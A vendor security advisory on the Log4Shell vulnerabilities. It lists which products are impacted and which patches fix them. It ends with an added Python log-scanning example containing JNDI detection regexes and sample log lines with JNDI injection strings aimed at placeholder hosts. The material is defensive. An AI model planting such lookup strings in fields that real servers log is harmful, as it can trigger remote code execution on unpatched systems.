Security Notice: Apache Log4j Remote Code Execution (RCE) Log4shell Vulnerability (CVE-2021-44228, CVE-2021-45046, CVE-2021-45105)

First Published: 12/14/2021   Last Updated: 12/24/2021

NOTICE: SonicWall continues to assess the impact the Log4j vulnerabilities have on its products and infrastructure; use of Log4j alone does not imply that exploitation is possible. Questions related to SonicWall infrastructure should be sent to info@sonicwall.com.


The Apache Log4j project disclosed CVE-2021-44228, a critical (CVSS 10.0) remote code execution (RCE) vulnerability affecting Apache Log4j2 <= 2.14.1. A security patch (Log4j 2.15.0) was released on December 10, 2021, and the subsequent Log4j 2.16.0 and Log4j 2.17.0 releases correct additional vulnerabilities (CVE-2021-45046, CVE-2021-45105).

  • For the latest information regarding SonicWall products and Apache Log4j 2.x, please see PSIRT Advisory ID SNWLID-2021-0032.
  • PSIRT is also tracking vulnerability CVE-2021-4104 related to Log4j 1.x and its impact on SonicWall products. Please reference PSIRT Advisory SNWLID-2021-0033 for updates regarding CVE-2021-4104 going forward.

The SonicWall Product Security Incident and Response Team (PSIRT) continues to review the impact this vulnerability has on SonicWall products. If your organization is using an affected product and end-user action is required, SonicWall will reach out to you directly with guidance.

SonicWall Product (Appliance/Cloud/Virtual/On-Prem) / Status / Description

Email Security (ES) & Hosted Email Security (HES)
Status: Impacted
Details: Email Security (ES) 10.0.12 and earlier versions are impacted by the Log4j vulnerabilities tracked as CVE-2021-44228 (ES 10.0.11 and earlier), CVE-2021-45046 and CVE-2021-45105.

SonicWall has released SonicWall Email Security firmware 10.0.13, which includes the updated Log4j2 2.17.0 that patches the above vulnerabilities. Hosted Email Security (HES) was patched automatically.

IMPORTANT: All SonicWall customers using Email Security (On-Prem) devices should immediately log in to MySonicWall and upgrade to Email Security firmware 10.0.13, even if they previously upgraded to 10.0.12.

For upgrade guidance, please review the KB article, "How do I upgrade firmware on an Email Security appliance?"

Network Security Manager (NSM) (SaaS, On-Prem)
Status: Impacted
Details: SonicWall PSIRT review has determined that NSM does use a vulnerable Log4j version. SonicWall has performed a comprehensive analysis of NSM that found no observable attack vectors for the Log4j2 suite of vulnerabilities.

However, to remove known or potential risk from customer environments, SonicWall has published NSM (On-Prem) firmware 2.3.2-R12-H2 to include Log4j 2.17.0, which addresses CVE-2021-45105 and CVE-2021-42550. As a precaution, NSM 2.3.2-R12-H2 also includes an upgrade to Logback 1.2.9 to address CVE-2021-42550.

NSM (SaaS) was automatically patched to the latest firmware.

IMPORTANT: All SonicWall customers using NSM (On-Prem) devices should immediately log in to MySonicWall and upgrade to 2.3.2-R12-H2, even if they previously upgraded to 2.3.2-R12-H1.

For upgrade guidance, please review the KB article, "How do I upgrade on-prem Network Security Manager firmware?"

Web Application Firewall (WAF)
Status: Partially Impacted
Details: Additional review has found that WAF 3.x uses Log4j, but only when the legacy 'Cloud Management' feature is enabled. SonicWall recommends that customers disable 'Cloud Management' if it is enabled; this change will not impact functionality, and the feature is disabled by default. WAF 2.x and earlier versions do not use Log4j and are not impacted. Please follow the guidance in the dedicated KB article for changing this setting.

Gen5 Firewalls (EOS)
  • TZ100/W, TZ200/W, TZ210/W
  • NSA 220/W
  • NSA 250M/250M-W
  • NSA 2400/MX/3500/4500/5500
  • NSA E5500/6500/6500/8500/8510
Status: Not Impacted
Details: Log4j2 is not used in the appliance.

Gen6 Firewalls
  • TZ300/W, TZ350/W, TZ400/W, TZ500/W, TZ600
  • NSa 2600/2650/3600/3650/4600/4650/5600/5650/6600/6650
  • SuperMassive 9200/9400/9600/9800
  • NSa 9250/9450/9650
  • NSsp 12400/12800
  • NSv 10/25/50/100/200/400/800/1600 (ESX, KVM, Hyper-V, AWS, Azure)
Status: Not Impacted
Details: Log4j2 is not used in the appliance.

Gen7 Firewalls
  • TZ270/W, TZ370/W, TZ470/W, TZ570/W, TZ670
  • NSa 2700/3700/4700/5700/6700
  • NSsp 10700/11700/13700/15700
  • NSv 270/470/870 (ESX, KVM, Hyper-V, AWS, Azure)
Status: Not Impacted
Details: Log4j2 is not used in the appliance.

SonicWall Switch
  • SWS 12-8/12-8POE
  • SWS 12-10FPOE
  • SWS 14-24/14-24FPOE
  • SWS 14-48/14-48FPOE
Status: Not Impacted
Details: Log4j2 is not used.

SMA 100
  • SMA 200/210/400/410
  • SMA 500v (ESX, KVM, Hyper-V, AWS, Azure)
Status: Not Impacted
Details: Log4j2 is not used.

SMA 1000
  • SMA 6200/7200/6210/7210
  • SMA 8200v (ESX, KVM, Hyper-V, AWS, Azure)
Status: Not Impacted
Details: Version 12.x is not using a vulnerable Log4j version.

MySonicWall (MSW)
Status: Not Impacted
Details: Log4j2 is not used.

Analyzer
Status: Not Impacted
Details: Analyzer 1.x is not using the vulnerable Log4j version.

GMS
Status: Not Impacted
Details: GMS versions 9.x and 8.x are not using the vulnerable Log4j version.

Capture Client & Capture Client Portal
Status: Not Impacted
Details: Log4j2 is not used.

CAS
Status: Not Impacted
Details: Log4j2 is not used.

Access Points
Status: Not Impacted
Details: Log4j2 is not used.

Wireless Network Manager (WNM)
Status: Not Impacted
Details: Log4j2 is not used.

Capture Security Appliance
Status: Not Impacted
Details: Log4j2 is not used.

WXA
  • WXA 2000/4000
  • Virtual: WXA 5000
  • Software: WXA 500, WXA 6000
Status: Not Impacted
Details: WXA is not using the vulnerable Log4j version.

CSCMA
Status: Not Impacted
Details: CSCMA is not using the vulnerable Log4j version.

EPRS
Status: Not Impacted
Details: EPRS 1.x and 2.x are not using the vulnerable Log4j version.

Cloud Edge
Status: Not Impacted
Details: Cloud Edge is not using the vulnerable Log4j version.

Analytics
Status: Not Impacted
Details: Analytics is not using the vulnerable Log4j version.


While there are no signs of active exploitation on SonicWall products, SonicWall urges organizations using Apache Log4j to patch immediately. The industry is observing coinminers, remote access trojans (RATs) and Cobalt Strike payloads being actively deployed against vulnerable servers.

SonicWall threat research teams have released the following IPS and WAF signatures to help detect attacks exploiting these vulnerabilities.

  • 2307 Apache Log4j2 JNDI Log Messages Remote Code Execution
  • 18198 Apache Log4j2 JNDI Log Messages Remote Code Execution LDAPS
  • 18199 Apache Log4j2 JNDI Log Messages Remote Code Execution NIS
  • 18200 Apache Log4j2 JNDI Log Messages Remote Code Execution NDS
  • 18201 Apache Log4j2 JNDI Log Messages Remote Code Execution COBRA
  • 18202 Apache Log4j2 JNDI Log Messages Remote Code Execution RMI
  • 18203 Apache Log4j2 JNDI Log Messages Remote Code Execution IIOP
  • 18204 Apache Log4j2 JNDI Log Messages Remote Code Execution DNS 2
  • 2311 Apache Log4j2 JNDI Log Messages Remote Code Execution HTTP
  • 2315 Apache Log4j2 JNDI Log Messages Remote Code Execution DNS
  • 2328 Apache Log4j2 JNDI Log Messages Remote Code Execution HTTPS
  • 1116 Apache Log4j2 JNDI Log Messages Remote Code Execution
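The signatures above are named for the JNDI scheme carried inside a logged message (LDAP/LDAPS, RMI, DNS, IIOP, CORBA, NDS, NIS, HTTP/HTTPS). Organizations that cannot yet deploy those signatures, or that want to hunt through existing logs, can apply the same idea to their own web-server or application logs. The following is an added example written for this notice, not SonicWall's signature logic or any SonicWall code: it flags the plain `${jndi:<scheme>:...}` lookup form, records which scheme was requested, and separately flags nested `${...${...}}` lookups, which Log4j 2 resolves inside-out and which a detection based only on the literal `jndi` token would miss. The log lines, hosts and scheme-to-signature mapping are constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# JNDI schemes named in the SonicWall signature list above, plus plain LDAP
# (the base signature does not spell out a scheme). Constructed for the example;
# it is not SonicWall's own scheme table.
JNDI_SCHEMES = frozenset(
    {"ldap", "ldaps", "rmi", "dns", "iiop", "corba", "nds", "nis", "http", "https"}
)

# Plain form of a Log4j 2 JNDI lookup embedded in attacker-controlled input:
# "${jndi:<scheme>:...}". Whitespace is tolerated because the substitution
# engine tolerates it too; matching is case-insensitive.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)

# A lookup opened inside another lookup. Log4j 2 resolves inner lookups first,
# so nested forms can assemble a token at runtime; flag them for review even
# when no literal "jndi" appears.
NESTED_RE = re.compile(r"\$\{[^}]*\$\{")


@dataclass(frozen=True)
class Finding:
    kind: str          # "jndi-lookup" or "nested-lookup"
    scheme: str        # requested scheme for jndi-lookup, "" otherwise
    known_scheme: bool # scheme is one of the schemes named in the signatures
    line: str          # the offending log line, kept for triage


def scan_line(line: str) -> Optional[Finding]:
    """Return a Finding for one log line, or None if nothing suspicious is present."""
    match = JNDI_RE.search(line)
    if match:
        scheme = match.group(1).lower()
        return Finding("jndi-lookup", scheme, scheme in JNDI_SCHEMES, line)
    if NESTED_RE.search(line):
        return Finding("nested-lookup", "", False, line)
    return None


def scan_log(lines: Iterable[str]) -> List[Finding]:
    """Scan an iterable of log lines and collect every finding in order."""
    return [f for f in (scan_line(ln) for ln in lines) if f is not None]


# Constructed sample access-log lines (not real traffic). The quoted field at
# the end stands in for a User-Agent header, a common place for such input.
SAMPLE_LOG = [
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.7 - - "GET /login HTTP/1.1" 200 "${jndi:ldap://example.invalid/a}"',
    '203.0.113.9 - - "GET /api HTTP/1.1" 404 "${JNDI:rmi://example.invalid/b}"',
    '203.0.113.11 - - "GET /x HTTP/1.1" 200 "${ctx:${env:USER}}"',
    '203.0.113.13 - - "GET /y HTTP/1.1" 200 "${jndi:foo://example.invalid/c}"',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        label = finding.scheme or "-"
        flag = "" if finding.known_scheme or finding.kind == "nested-lookup" else " (unlisted scheme)"
        print(f"{finding.kind:14} {label:6}{flag}: {finding.line}")
```

Running the block over the constructed log prints one line per finding: the LDAP and RMI lookups map to schemes named in the signature list, the nested `${ctx:${env:USER}}` line is reported for review without a scheme, and the `foo` scheme is reported as unlisted so that a new or unexpected scheme is not silently ignored. The first line, a normal request, produces nothing. An unlisted scheme is still a JNDI lookup and should be triaged with the same urgency as a listed one.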
